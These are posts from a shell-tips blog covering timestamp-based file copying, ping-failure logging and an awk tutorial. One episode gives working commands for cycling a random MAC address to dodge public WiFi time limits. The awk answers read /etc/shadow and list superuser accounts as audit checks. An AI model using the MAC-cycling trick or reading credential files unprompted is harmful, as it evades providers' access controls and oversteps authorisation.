Tuesday, July 2, 2013

Episode #168: Scan On, You Crazy Command Line

Hal gets back to our roots

With one ear carefully tuned to cries of desperation from the Internet, it's no wonder I picked up on a plea from David Nides on Twitter: he wanted to scan for files based on their MAC timestamps and copy the matches off to another directory.

Whenever I see a request to scan for files based on certain criteria and then copy them someplace else, I immediately think of the "find ... | cpio -pd ..." trick I've used in several other Episodes.

Happily, "find" has "-mtime", "-atime", and "-ctime" options we can use for identifying the files. But they all want their arguments to be in terms of number of days. So I need to calculate the number of days between today and the start of 2012. Let's do that via a little command-line kung fu, shall we? That will make this more fun.

$ days=$(( ($(date +%Y) - 2012)*365 + $(date +%j | sed 's/^0*//') ))
$ echo $days
447

Whoa nelly! What just happened there? Well, I'm doing math with the bash "$(( ... ))" operator and assigning the result to a variable called "days" so I can use it later. But what's all that line noise in the middle?

  • "date +%Y" returns the current year. That's inside "$( ... )" so I can use the value in my calculations.
  • I subtract 2012 from the current year to get the number of years since 2012 and multiply that by 365. Screw you, leap years!
  • "date +%j" returns the current day of the year, a value from 001-366.
  • Unfortunately the shell interprets values with leading zeroes as octal and errors out on values like "008" and "097". So I use a little sed to strip the leading zeroes (see the example just below this list).
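
For instance, here's what the leading-zero problem looks like in bash arithmetic (an illustrative example; the exact error text may vary by bash version):

$ echo $(( 008 + 1 ))
bash: 008: value too great for base (error token is "008")
$ echo $(( $(echo 008 | sed 's/^0*//') + 1 ))
9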

Hey, I said it would be fun, not that it would necessarily be a good idea!

But now that I've got my "$days" value, the answer to David's original request couldn't be easier:

$ find /some/dir -mtime +$days -atime +$days -ctime +$days | cpio -pd /new/dir

The "find" command locates files whose MAC times are all greater than our "$days" value-- that's what the "+$days" syntax means. After that, it's just a matter of passing the found files off to "cpio". Calculating "$days" was the hard part.

My final solution was short enough that I tweeted it back to David. Which took me all the way back to the early days of Command-Line Kung Fu, when Ed Skoudis had hair and would tweet cute little CMD.EXE hacks that he could barely fit into 140 characters. And I would respond with bash code that would barely line wrap. Ah, those were the days!

Of course, Tim was still in diapers then. But he's come so far, that precocious little rascal! Let's see what he has for us this time!

Tim gets an easy one!

Holy Guacamole! This is FINALLY an easy one! Robocopy makes this super easy *and* it plays well with leap years. I feel like it is my birthday and I can finally get out of these diapers.

PS C:\> robocopy \some\dir \new\dir /MINLAD (Get-Date).DayOfYear /MINAGE (Get-Date).DayOfYear /MOV

Simply specify the source and destination directories and use /MOV to move the files. MINLAD will ignore files that have been accessed in the past X days (LAD = Last Access Date), and MINAGE does the same based on the creation date. All we need is the number of days since the beginning of the year. Fortunately, getting that number is super easy in PowerShell (I have no pity for Hal).

All Date objects have the property DayOfYear which is (surprise, surprise) the number of days since the beginning of the year (Get-Member will show all the available properties and methods of an object). All we need is the current date, which we get with Get-Date.

DONE! That's all folks! You can go home now. I know you expected a long complicated command, but we don't have one here. However, if you feel that you need to read more you can go back and read the episodes where we cover some other options available with robocopy.

This command is so easy, simple, and short I could even fit it into a tweet!

Tuesday, June 18, 2013

Episode #167: Big MAC

Hal checks into Twitter:

So there I was, browsing my Twitter timeline and a friend forwarded a link to Jeremy Ashkenas' github site. Jeremy created an alias for changing your MAC address to a random value. This is useful when you're on a public WiFi network that only gives you a limited number of free minutes. Since most of these services keep track by noting your MAC address, as long as you keep cycling your MAC, you can keep using the network for free.

Here's the core of Jeremy's alias:

sudo ifconfig en0 ether `openssl rand -hex 6 | sed "s/\(..\)/\1:/g; s/.$//"`

Note that the syntax of the ifconfig command varies a great deal between various OS versions. On my Linux machine, the syntax would be "sudo ifconfig wlan0 hw ether..."-- you need "hw ether" after the interface name and not just "ether".

Anyway, this seemed like a lot of code just to generate a random MAC address. Besides, what if you didn't have the openssl command installed on your Linux box? So I decided to try and figure out how to generate a random MAC address in fewer characters and using commonly built-in tools.

What does a MAC address look like? It's six pairs of hex digits with colons in between. "Pairs of digits with colons between" immediately made me think of time values. And this works:

$ date +00:11:22:%T
00:11:22:11:23:08

Just print three pairs of fixed digits followed by "hh:mm:ss". I originally tried "date +%T:%T". But in my testing, the ifconfig command didn't always like the fake MAC addresses that were generated this way. So specifying the first few octets was the way to go.
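
For reference, here's the sort of address that first attempt spits out (output illustrative):

$ date +%T:%T
11:23:08:11:23:08

My guess is that the trouble comes from the first octet: whenever the last digit of the hour is odd, the low-order (multicast) bit of the first byte is set, and the kernel won't assign a multicast address as a unicast MAC. Starting with a fixed "00" sidesteps that entirely.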

The only problem is that this address really isn't all that random. If there were a lot of people on the same WiFi network all using this trick, MAC address collisions could happen pretty easily. Though if everybody chose their own personal sequence for the first three octets, you could make this a lot less likely.

The Linux date command lets you output a nine-digit nanoseconds value with "%N". I could combine that with a few leading digits to generate a pseudo-random sequence of 12 digits:

$ date +000%N
000801073504

But now we need to use the sed expression in Jeremy's original alias to put the colons in. Or do we?

$ sudo ifconfig wlan0 hw ether $(date +000%N)
$ ifconfig wlan0
wlan0     Link encap:Ethernet  HWaddr 00:02:80:12:43:53  
...

I admit that I was a little shocked when I tried this and it actually worked! I can't guarantee that it will work across all Unix-like operating systems, but it allows me to come up with a much shorter bit of fu compared to Jeremy's solution.

What if you were on a system that didn't have openssl installed and didn't have a date command that had nanosecond resolution? If your system has a /dev/urandom device (and most do) you could use the trick we used way back in Episode #85:

$ sudo ifconfig wlan0 hw ether 00$(head /dev/urandom | tr -dc a-f0-9 | cut -c1-10)
$ ifconfig wlan0
wlan0     Link encap:Ethernet  HWaddr 00:7a:5f:be:a2:ca
...

Again I'm using two literal zeroes at the front of the MAC address, so that I create addresses that don't cause ifconfig to error out on me.

The expression above is not very short, but at least it uses basic commands that will be available on pretty much any Unix-like OS. If your ifconfig needs colons between the octets, then you'll have to add a little sed like Jeremy did:

$ sudo ifconfig wlan0 hw ether \
    00$(head /dev/urandom | tr -dc a-f0-9 | sed 's/\(..\)/:\1/g;' | cut -c1-15)
$ ifconfig wlan0
wlan0     Link encap:Ethernet  HWaddr 00:d9:3e:0d:80:57  
...

Jeremy's sed is more complicated because he takes 12 digits and adds colons after each octet, but leaves a trailing colon at the end of the address. So he has a second substitution to drop the trailing colon. I'm using cut to trim off the extra output anyway, so I don't really need the extra sed substitution. Also, since I'm specifying the first octet outside of the "$(...)", my sed expression puts the colons in front of each octet.
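
To see why Jeremy needs that second substitution, here's his expression with and without it (sample output; your random bytes will differ):

$ openssl rand -hex 6 | sed 's/\(..\)/\1:/g'
3f:a9:0c:1d:22:7b:
$ openssl rand -hex 6 | sed 's/\(..\)/\1:/g; s/.$//'
5e:02:9a:41:c3:8d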

So there you have it. There's a very short solution for my Linux box that has a date command with nanosecond resolution and a very forgiving ifconfig command. And a longer solution that should work on pretty much any Unix-like OS. But even my longest solution is surely going to look great compared to what Tim's going to have to deal with.

Tim wishes he hadn't checked into Twitter:

I'm so jealous of Hal. I think his entire command is shorter than the name of my interface. This command is painful, quite painful. I would very much suggest something like Technitium's MAC Address Changer, but since Hal set me up, here we go...

To start off, we need to get the name of our target interface. Sadly, the interface names aren't as simple as they are on a *nix box. Not only is the name 11 times longer, but it is not easy to type. If you run "ipconfig /all" you can find the name and copy/paste it. (By the way, I'm only going to use PowerShell here; the CMD.EXE version would be ugly^2).

PS C:\> $ifname = "Intel(R) 82574L Gigabit Network Connection"

The MAC address for each interface is stored somewhere in the registry under this even-less-easy-to-type Key:
HKLM:\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\[Some 4 digit number]\

First, a bit of clarification. Many people (erroneously) refer to Keys as the name/value pairs, but those pairs are actually called Values. A key is the container object (similar to a directory). How about that for a little piece of trivia?

With PowerShell we can use Get-ChildItem (alias dir, ls, gci) to list all the keys and then Get-ItemProperty (alias gp) to list the DriverDesc values. A simple Where-Object filter (alias where, ?) will find the key we need.

PS C:\> Get-ChildItem HKLM:\SYSTEM\CurrentControlSet\Control\Class\`{4D36E972-E325-
 11CE-BFC1-08002bE10318`}\[0-9]*\ | Get-ItemProperty -Name DriverDesc | 
 ? DriverDesc -eq "Intel(R) 82574L Gigabit Network Connection"
DriverDesc   : Intel(R) 82574L Gigabit Network Connection
PSPath       : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SY...0318}\0010
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SY...0318}
PSChildName  : 0010
PSProvider   : Microsoft.PowerShell.Core\Registry

Note: the curly braces ({}) need to be prefixed with a back tick (`) so they are not interpreted as a script block.

So now we have the Key for our target network interface. Next, we need to generate a random MAC address. Fortunately, Windows does not require the use of colons (or dots) in the MAC address. This is nice as it makes our command a little easier to read (a very, very little, but we'll take any win we can). The acceptable values are between 000000000000 and fffffffffffe (ffffffffffff is the broadcast address and should be avoided). This is the range between 0 and 2^48-2 ([Math]::Pow(2,8*6)-2 = 281474976710654). The random number is then formatted as a 12 digit hex number.

PS C:\> [String]::Format("{0:x12}", (Get-Random -Minimum 0 -Maximum 281474976710655))
16db434bed4e
PS C:\> [String]::Format("{0:x12}", (Get-Random -Minimum 0 -Maximum 281474976710655))
a31bfae1296d

We have a random MAC address value and we know the Key, now we need to put those two pieces together to actually change the MAC address. The New-ItemProperty cmdlet will create the value if it doesn't exist and the -Force option will overwrite it if it already exists. This results in the final version of our ugly command. We could shorten the command a little (very little) bit, but this is the way its mother loves it, so we'll leave it alone.

PS C:\> ls HKLM:\SYSTEM\CurrentControlSet\Control\Class\`{4D36E972-E325-11CE-BFC1-
 08002bE10318`}\0*\ | Get-ItemProperty -Name DriverDesc | ? DriverDesc -eq 
 "Intel(R) 82574L Gigabit Network Connection" | New-ItemProperty -Name 
 NetworkAddress -Value ([String]::Format("{0:x12}", (Get-Random -Minimum 0 
 -Maximum 281474976710655))) -PropertyType String -Force

You would think that after all of this mess we would be good to go, but you would be wrong. As with most things Windows, you could reboot the system to have this take effect, but that's no fun. We can accomplish the same goal by disabling and enabling the connection. This syntax isn't too bad, but we need to use a different long name here.

PS C:\> netsh interface set interface name="Wired Ethernet Connection" admin=DISABLED
PS C:\> netsh interface set interface name="Wired Ethernet Connection" admin=ENABLED

At this point you should be running with the new MAC address.

And now you can see why I recommend a better tool to do this...and why I envy Hal.

EDIT:
Andres Elliku wrote in and reminded me of the new NetAdapter cmdlets in version 3. Here is his response.

This is directed mainly to Tim as a suggestion to decrease his pain. :) (Tim's comment: for this I'm thankful!)

PowerShell has included the NetAdapter module since version 3.0. This means that in PowerShell you could set the MAC address with something like:

PS C:\> Set-NetAdapter -Name "Wi-Fi" -MacAddress ([String]::Format("{0:x12}", 
(Get-Random -Minimum 0 -Maximum 281474976710655))) | Restart-NetAdapter

NB! The adapter name might vary, but usually they are still pretty short.

The shorter interface names are one of my favorite features of Windows 8 and Windows 2012. Also, with these cmdlets we don't need the name of the device (Intel blah blah blah), just the newly shortened interface name. Great stuff Andres. Thanks for writing in! -Tim

EDIT 2:

@PowerShellGuy tweeted an even shorter version using the format operator and built-in byte conversion:

PS C:\> Set-NetAdapter "wi-fi" -mac ("{0:x12}" -f (get-random -max (256tb-1))) | 
Restart-NetAdapter

Well done for really shortening the command -Tim

Tuesday, March 12, 2013

Episode #166: Ping A Little Log For Me

We've been away for a while because, frankly, we ran out of material. In the meantime we tried to come up with some new ideas and there have been a few requests, but sadly they were all redundant, became scripts, or both. We've been looking long and hard for Fu that works in this format, and we've finally found it!

Nathan Sweaney wrote in with a great idea! It isn't a script, it isn't redundant, and it is quite useful. That's three of the four criteria that make a great episode (the fourth being beer fetching or beer opening). To top it off, Nathan wrote the CMD.EXE portion himself. Thanks Nathan!

--Tim

Nathan Sweaney writes in:

Ping Network Monitor

Occasionally we have issues in the field where we think a customer's device is occasionally losing a connection, but we're not sure if, or when, or for how long. We need a log of when the connection is dropping so that we can compare to the customer's reports of issues. Sure there are fancy network monitoring tools that can help, but we're in a hurry with no budget.

In Linux this would be easy, but these are Windows boxen. So I hacked together the following one-liner for our techs to use in the field.

This command will ping an IP address once every second and when it doesn't get a response, it will log the time-stamp in a text file. Then we can compare those time-stamps to failure reports from the customer.

To use it, simply change the IP address 8.8.8.8 near the beginning to whatever IP we need to monitor. Then open a command prompt, CD into the directory you want the log file created, and run the command.

C:\> cmd.exe /v:on /c "FOR /L %i in (1,0,2) do @ping -n 1 8.8.8.8 |
find "Request timed out">NUL && (echo !date! !time! >> PingFail.txt) &
ping -n 2 127.0.0.1>NUL"

So let's dissect this. It's mostly just a combination of examples Ed has mentioned in the past.

First, we're using the "cmd.exe /v:on /c" command to allow for delayed environment variable expansion. Ed has explained in the past why that lets us do flexible variable parsing. This command wraps everything else.

The next layer of our onion is an infinite "FOR /L" loop that Ed mentioned WAY back. We're counting from 1 to 2 in steps of 0 so that our command will continue running until we manually stop it.

Inside of our FOR loop is where we really get to the meat. We've basically got 4 steps:

1) First we see @ping -n 1 8.8.8.8. The @ symbol says to hide the echo of the command to the screen. The switch (-n 1) says to only ping the IP once. And of course 8.8.8.8 is the address we want to ping.

2) Next we pipe the results of our ping into the FIND command and search for "Request timed out" to see if the ping failed. The last part of that >NUL says to dump the output from this command into NUL, because we don't really need to see it.

3) Now we get fancy. The && says to only run this command if the previous command succeeded. In other words, if our FIND command finds the text, which means our ping failed, then we run this command. And we've enclosed this command in parentheses to contain it as a single command. We need to use the "cmd.exe /v:on /c" command at the beginning to allow for delayed environment variable expansion; that way our time & date changes each iteration. So %date% and %time% become !date! and !time!.

And finally we're redirecting our output to a file called PingFail.txt. We use the >> operator to append each new entry rather than overwrite with just >.

4) And finally we're on to the last step. As mentioned before, the & says to run the next command no matter what has already happened. This command simply pings localhost with (-n 2) which will give us a one-second delay. The first ping happens immediately, and the second ping happens after one second. This slows down our original ping back in step 1 which would otherwise fire off like a machine gun as fast as the FOR loop can go. Lastly, we're redirecting the output with >NUL because we don't care to see it.

WOW. I said it was convoluted. But it works, and it's rather simple to use.

Tim finds a letter in the mail slot:

Wow, it has been a while since we've dusted off the ol' kung fu for a blog post. I've missed it and I know Hal has too. In fact, he hasn't showered since our last episode. True story. This was his silent (but deadly) protest against our lack of ideas and usable suggestions. The Northwest can breathe a sigh of relief (in the now fresher air) now that we are back for this episode. I, for one, missed the blog. Back to the Fu...

Nathan wrote in with his idea to log Ping failures. What a great idea for a quick and dirty network monitor. Thanks to CMD.EXE he's got a bit of funkiness in his command. Fortunately, we can be a little smoother with our approach.

PS C:\> for (;;) { Start-Sleep 2; ping -n 1 8.8.8.8 >$null; if(-not $?) { Get-Date -Format s | Tee-
Object mylog.txt -Append }}
2013-03-12T12:34:56

We start off with an infinite loop using the For loop but without any loop control structures. Without these structures there is nothing to limit the loop, and it will run forever...it will be UNSTOPPABLE! MWAAAAAHAHAHAHAHA! <cough> <cough> Sorry about that, it's been a while.

Inside our infinite loop we sleep for a few seconds. We could do it at the end, but for some reason I get inconsistent results when I do that. I have no idea why, and I've tried troubleshooting it for hours. That's OK, a pre-command nap never killed anyone.

After our brief nap, we do the ping. The results are sent into the garbage can that is the $NULL variable. Following this command we check the error state of the previous command by checking the value of $?. This variable is True if the previous command ran without error; if there was an error, it is False. The If statement is used to branch our logic based on this value. If it is False, the ping failed, and we need to log the error.

Inside our branch we get the current date with Get-Date (duh!) and change the format to the sortable format. We could use any format, but the OCD part of me likes this format. The formatted date is piped into the Tee-Object command which will append the date to a file as well as output to our console.

Notice we used the For loop here instead of a While loop. I did this to save a single character. We can save a few more characters by using aliases, shortened parameter names, and a little magic in our For loop.

PS C:\> for (;;sleep 2) {ping -n 1 8.8.8.8 >$null; if(-not $?) { date -f s | tee mylog.txt -a }}

I moved the Start-Sleep (alias sleep) cmdlet inside the For loop control. The For loop looks like this:

for ( variable initialization; condition; variable update ) {
  Code to execute while the condition is true
}

The variable initialization is run once before our loop starts. The condition is checked every time through the loop to see if we should continue the loop. We have no variable we care to initialize, and we want the loop to run forever so we don't use a condition. The variable update piece is executed after each time through the loop, and this we can use. Instead of modifying a variable used in the loop, we take a lovely two second nap. This gives us our nice delay between each ping.

There you have the long awaited PowerShell version of this command. It is better than CMD.EXE, but there is no nice way to use the short-circuit && or || operators to make this command more efficient. Don't tell Hal, but I'm really jealous of the way his shell can be used to complete this task. I'm jealous of his terseness...and his full head of hair.

Hal washes clean

Let's be clear. The only thing that smells around here is the Windows shells. Have to use ping to put a sleep in your loop? Sleep that works at the start of the loop but not the end? What kind of Mickey Mouse operating system is that?

The Linux solution doesn't look a lot different from the Windows solutions:

while :; do ping -c 1 -W 1 8.8.8.8 >/dev/null || date; sleep 1; done

"while :; do ... done" is the most convenient way of doing an infinite loop in the shell. The ping command uses the "-c 1" option to only send a single ping and "-W 1" to only wait one second for the response. We send the ping output to /dev/null so that it doesn't clutter the output of our loop. Whenever the ping fails, it returns false and we end up running the date command on the right-hand side to output a timestamp. The last thing in the loop is a sleep for one second. And yes, Tim, it actually works at the end of the loop in my shell.

Well that was easy. Hmmm, I don't want to embarrass Nathan and Tim by making my part of the Episode too short. How about we make the output of the date command a little nicer:

while :; do ping -c 1 -W 1 8.8.8.8 >/dev/null || date '+%F %T'; sleep 1; done

"%F" is the "full" ANSI-style date format "2013-03-12" and "%T" is the time in 24-hour notation. So we get "2013-03-12 04:56:22" instead of the default "Tue Mar 12 04:56:22 EST 2013".

Oh, you want to save the output in a file as well as having it show up in your terminal window? No problemo:

while :; do ping -c 1 -W 1 8.8.8.8 >/dev/null || date; sleep 1; done | tee mylog.txt

Hooray for tee!

Well I can't tart this up any more to save Tim and Nathan's fragile egos. So I'm outta here to go find a shower.

Sunday, January 6, 2013

An AWK-ward Response

A couple of weeks ago I promised some answers to the exercises I proposed at the end of my last post. What we have here is a case of, "Better late than never!"

1. If you go back and look at the example where I counted the number of processes per user, you'll notice that the "UID" header from the ps command ends up being counted. How would you suppress this?

There are a couple of different ways you could attack this using the material I showed you in the previous post. One way would be to do a string comparison on field $1:

$ ps -ef | awk '$1 != "UID" {print $1}' | sort | uniq -c | sort -nr
    178 root
     58 hal
      2 www-data
    ...

An alternative approach would be to use pattern matching to print lines that don't match the string "UID". The "!" operator means "not", so the expression "!/UID/" does what we want:

$ ps -ef | awk '!/UID/ {print $1}' | sort | uniq -c | sort -nr
    178 root
     57 hal
      2 www-data
    ...

You'll notice that the "!/UID/" version counts one less process for user "hal" than the string comparison version. That's because the awk process itself appears in the ps output with "UID" in its command line, so the pattern match filters it out and it never gets counted. So the string comparison version is slightly more accurate.

2. Print out the usernames of all accounts with superuser privileges (UID is 0 in /etc/passwd).

Remember that the /etc/passwd file is colon-delimited, so we'll use awk's "-F" option to split on colons. UID is field #3 and the username is field #1:

$ awk -F: '$3 == 0 {print $1}' /etc/passwd
root

Normally, a Unix-like OS will only have a single UID 0 account named "root". If you find other UID 0 accounts in your password file, they could be a sign that somebody's doing something naughty.
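
If you want the check to flag only the unexpected entries, a small variation (my own addition, not part of the original exercise) skips the legitimate root account:

$ awk -F: '$3 == 0 && $1 != "root" {print $1}' /etc/passwd

Any output from that command deserves a closer look.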

3. Print out the usernames of all accounts with null password fields in /etc/shadow.

You'll need to be root to do this one, since /etc/shadow is only readable by the superuser:

# awk -F: '$2 == "" {print $1}' /etc/shadow

Again, we use "-F:" to split the fields in /etc/shadow. We look for lines where the second field (containing the password hash) is the empty string and print the first field (the username) when this condition is true. It's really not much different from the previous /etc/passwd example.

You should get no output. There shouldn't be any entries in /etc/shadow with null password hashes!

4. Print out process data for all commands being run as root by interactive users on the system (HINT: If the command is interactive, then the "TTY" column will have something other than a "?" in it)

The "TTY" column in the "ps" output is field #6 and the username field is #1:

# ps -ef | awk '$1 == "root" && $6 != "?" {print}'
root      1422     1  0 Jan05 tty4     00:00:00 /sbin/getty -8 38400 tty4
root      1427     1  0 Jan05 tty5     00:00:00 /sbin/getty -8 38400 tty5
root      1434     1  0 Jan05 tty2     00:00:00 /sbin/getty -8 38400 tty2
root      1435     1  0 Jan05 tty3     00:00:00 /sbin/getty -8 38400 tty3
root      1438     1  0 Jan05 tty6     00:00:00 /sbin/getty -8 38400 tty6
root      1614  1523  0 Jan05 tty7     00:09:00 /usr/bin/X :0 -nr -verbose -auth ... 
root      2082     1  0 Jan05 tty1     00:00:00 /sbin/getty -8 38400 tty1
root      5909  5864  0 13:42 pts/3    00:00:00 su -
root      5938  5909  0 13:42 pts/3    00:00:00 -su
root      5968  5938  0 13:47 pts/3    00:00:00 ps -ef
root      5969  5938  0 13:47 pts/3    00:00:00 awk $1 == "root" && $6 != "?" {print}

We look for the keyword "root" in the first field, and anything that's not "?" in the sixth field. If both conditions are true, then we just print out the entire line with "{print}".

Actually, "{print}" is the default action for awk. So we could shorten our code just a bit:

# ps -ef | awk '$1 == "root" && $6 != "?"'
root      1422     1  0 Jan05 tty4     00:00:00 /sbin/getty -8 38400 tty4
root      1427     1  0 Jan05 tty5     00:00:00 /sbin/getty -8 38400 tty5
root      1434     1  0 Jan05 tty2     00:00:00 /sbin/getty -8 38400 tty2
...

5. I mentioned that if you kill all the sshd processes while logged in via SSH, you'll be kicked out of the box (you killed your own sshd process) and unable to log back in (you've killed the master SSH daemon). Fix the awk so that it only prints out the PIDs of SSH daemon processes that (a) don't belong to you, and (b) aren't the master SSH daemon (HINT: The master SSH daemon is the one whose parent process ID is 1).

This one's a little tricky. Take a look at the sshd processes on my system:

# ps -ef | grep sshd
root      3394     1  0  2012 ?        00:00:00 /usr/sbin/sshd
root     13248  3394  0 Jan05 ?        00:00:00 sshd: hal [priv] 
hal      13250 13248  0 Jan05 ?        00:00:02 sshd: hal@pts/0  
root     25189  3394  0 08:27 ?        00:00:00 sshd: hal [priv] 
hal      25191 25189  0 08:27 ?        00:00:00 sshd: hal@pts/1  
root     25835 25807  0 15:33 pts/1    00:00:00 grep sshd

For modern SSH daemons with "Privilege Separation" enabled, there are actually two sshd processes per login. There's a root-owned process marked as "sshd: <user> [priv]" and a process owned by the user marked as "sshd: <user>@<tty>". Life would be a whole lot easier if both processes were identified with the associated pty, but alas things didn't work out that way. So here's what I came up with:

# ps -ef | awk '/sshd/ && !($3 == 1 || /sshd: hal[@ ]/) {print $2}'

First we eliminate all processes except for the sshd processes with "/sshd/". Then we only print the process ID if the process is neither the master SSH daemon ("$3 == 1" checks for a PPID of 1) nor one of my own sshd processes ("/sshd: hal[@ ]/" means the string "sshd: hal" followed by either "@" or a space). If everything looks good, then we print the process ID of the process ("{print $2}").

Frankly, that's some pretty nasty awk. I'm not sure it's something I'd come up with easily on the spur of the moment.

6. Use awk to parse the output of the ifconfig command and print out the IP address of the local system.

Here's the output from ifconfig on my system:

$ ifconfig eth0
eth0      Link encap:Ethernet  HWaddr f0:de:f1:29:c7:18  
          inet addr:192.168.0.14  Bcast:192.168.0.255  Mask:255.255.255.0
          inet6 addr: fe80::f2de:f1ff:fe29:c718/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:7724312 errors:0 dropped:0 overruns:0 frame:0
          TX packets:13553720 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:100 
          RX bytes:711630936 (711.6 MB)  TX bytes:17529013051 (17.5 GB)
          Memory:f2500000-f2520000 

So this is a reasonable first approximation:

$ ifconfig eth0 | awk '/inet addr:/ {print $2}'
addr:192.168.0.14

The only problem is the "addr:" bit that's still hanging on. awk has a number of built-in functions, including substr() which can help us in this case:

$ ifconfig eth0 | awk '/inet addr:/ {print substr($2, 6)}'
192.168.0.14

substr() takes as arguments the string we're working on (field $2 in this case) and the place in the string where you want to start (for us, that's the sixth character so we skip over the "addr:"). There's an optional third argument which is the number of characters to grab. If you leave that off, then you just get the rest of the string, which is what we want here.
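
Just to illustrate that optional third argument, here's a contrived example (not part of the exercise) that grabs exactly seven characters starting at position six:

$ echo "inet addr:192.168.0.14" | awk '{print substr($2, 6, 7)}'
192.168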

There are lots of other useful built-in functions in awk. Consult the manual page for further info.

7. Parse the output of "lsof -nPi" and output the unique process name, PID, user ID, and port combinations for all processes that are in "LISTEN" mode on ports on the system.

Let's take a look at the "lsof -nPi" output using awk to match only the lines for "LISTEN" mode:

# lsof -nPi | awk '/LISTEN/'
sshd      1216     root    3u  IPv4   5264      0t0  TCP *:22 (LISTEN)
sshd      1216     root    4u  IPv6   5266      0t0  TCP *:22 (LISTEN)
mysqld    1610    mysql   10u  IPv4   6146      0t0  TCP 127.0.0.1:3306 (LISTEN)
vmware-au 1804     root    8u  IPv4   6440      0t0  TCP *:902 (LISTEN)
cupsd     1879     root    6u  IPv6  73057      0t0  TCP [::1]:631 (LISTEN)
cupsd     1879     root    8u  IPv4  73058      0t0  TCP 127.0.0.1:631 (LISTEN)
apache2   1964     root    4u  IPv4   7412      0t0  TCP *:80 (LISTEN)
apache2   1964     root    5u  IPv4   7414      0t0  TCP *:443 (LISTEN)
apache2   4112 www-data    4u  IPv4   7412      0t0  TCP *:80 (LISTEN)
apache2   4112 www-data    5u  IPv4   7414      0t0  TCP *:443 (LISTEN)
apache2   4113 www-data    4u  IPv4   7412      0t0  TCP *:80 (LISTEN)
apache2   4113 www-data    5u  IPv4   7414      0t0  TCP *:443 (LISTEN)
skype     5133      hal   41u  IPv4 104783      0t0  TCP *:6553 (LISTEN)

Process name, PID, and process owner are fields 1-3 and the protocol and port are in fields 8-9. So that suggests the following awk:

# lsof -nPi | awk '/LISTEN/ {print $1, $2, $3, $8, $9}'
sshd 1216 root TCP *:22
sshd 1216 root TCP *:22
mysqld 1610 mysql TCP 127.0.0.1:3306
vmware-au 1804 root TCP *:902
cupsd 1879 root TCP [::1]:631
cupsd 1879 root TCP 127.0.0.1:631
apache2 1964 root TCP *:80
apache2 1964 root TCP *:443
apache2 4112 www-data TCP *:80
apache2 4112 www-data TCP *:443
apache2 4113 www-data TCP *:80
apache2 4113 www-data TCP *:443
skype 5133 hal TCP *:6553

And if we want the unique entries, then just use "sort -u":

# lsof -nPi | awk '/LISTEN/ {print $1, $2, $3, $8, $9}' | sort -u
apache2 1964 root TCP *:443
apache2 1964 root TCP *:80
apache2 4112 www-data TCP *:443
apache2 4112 www-data TCP *:80
apache2 4113 www-data TCP *:443
apache2 4113 www-data TCP *:80
cupsd 1879 root TCP 127.0.0.1:631
cupsd 1879 root TCP [::1]:631
mysqld 1610 mysql TCP 127.0.0.1:3306
skype 5133 hal TCP *:6553
sshd 1216 root TCP *:22
vmware-au 1804 root TCP *:902

Looking at the output, I'm not sure I care about all of the different apache2 instances. All I really want to know is which program is using port 80/tcp and 443/tcp. So perhaps we should just drop the PID and process owner:

# lsof -nPi | awk '/LISTEN/ {print $1, $8, $9}' | sort -u
apache2 TCP *:443
apache2 TCP *:80
cupsd TCP 127.0.0.1:631
cupsd TCP [::1]:631
mysqld TCP 127.0.0.1:3306
skype TCP *:6553
sshd TCP *:22
vmware-au TCP *:902

In the above output you see cupsd bound to both the IPv4 and IPv6 loopback address. If you just care about the port numbers, we can flash a little sed to clean things up:

# lsof -nPi | awk '/LISTEN/ {print $1, $8, $9}' | \
    sed 's/[^ ]*:\([0-9]*\)/\1/' | sort -u -n -k3
sshd TCP 22
apache2 TCP 80
apache2 TCP 443
cupsd TCP 631
vmware-au TCP 902
mysqld TCP 3306
skype TCP 6553

In the sed expression I'm matching "some non-space characters followed by a colon" ("[^ ]*:") with some digits afterwards ("[0-9]*"). The digits are the port number, so we replace the matching expression with just the port number. Notice I used "\(...\)" around the "[0-9]*" to create a sub-expression that I can substitute on the right-hand side as "\1".

I've also modified the final "sort" command so that we get a numeric ("-n") sort on the port number ("-k3" for the third column). That makes the output look more natural to me.

I guess the moral of the story here is that awk is good for many things, but not necessarily for everything. Don't forget that there are other standard commands like sed and sort that can help produce the output that you're looking for.

Happy awk-ing everyone!

Thursday, December 20, 2012

AWK-ward!

Yesterday I got an email from a friend who complained that "awk is still a mystery". Not being one to ignore a cry for help with the command line, I was motivated to write up a simple introduction to the basics of awk. But where to post it? I know! We've got this little blog we're not doing anything with at the moment (er, yeah, sorry about that folks-- life's been exciting for the Command Line Kung Fu team recently)...

Lesson #1 -- It's a big loop!

The first thing you need to understand about awk is that it reads and operates on each line of input one at a time. It's as if your awk code were sitting inside a big loop:

for each line of input
    # your code is here
end loop

Your code goes in curly braces. So the simplest awk program is one that just prints out every line of a file:

awk '{print}' /etc/passwd

Nothing too exciting there. It's just a more complicated way to "cat /etc/passwd". Note that you generally want to enclose your awk code in single quotes like I did in the example above. This prevents special characters in the awk script from being interpolated by your shell before they even get to awk.
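
Here's a quick demonstration of why the quoting matters (an example of my own, using $2 so the difference is easy to see):

$ echo 'a b c' | awk '{print $2}'
b
$ echo 'a b c' | awk "{print $2}"
a b c

With double quotes, the shell expands $2 itself (almost certainly to nothing) before awk ever runs, so awk ends up with just "{print }" and dumps the whole line.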

Lesson #2 -- awk splits the line into fields

One of the nice features of awk is that it automatically splits up each input line using whitespace as the delimiter. It doesn't matter how many spaces/tabs appear in between items on the line, each chunk of whitespace in its entirety is treated as a delimiter.

The whitespace-delimited fields are put into variables named $1, $2, and so on. Rather than just doing "print" as we did in the last example (which prints out the whole original line), you can print out any of the individual fields by number. For example, I can pull out the percentage used (field 5) and file system mount point (field 6) from df output:

$ df -h -t ext4 | awk '{print $5, $6}'
Use% Mounted
58% /
24% /boot
42% /var
81% /home
89% /usr

The comma in the "print $5, $6" expression causes awk to put a space between the two fields. If you did "print $5 $6", you'd get the two fields jammed up against each other with no space between them.
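
For example (illustrative):

$ echo 'alpha beta' | awk '{print $1, $2}'
alpha beta
$ echo 'alpha beta' | awk '{print $1 $2}'
alphabeta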

We could use a similar strategy to pull out just the usernames from ps (field 1):

$ ps -ef | awk '{print $1}'
UID
root
root
root
...

Not so interesting maybe, until you start combining it with other shell primitives:

$ ps -ef | awk '{print $1}' | sort | uniq -c | sort -nr
    188 root
     70 hal
      2 www-data
      2 avahi
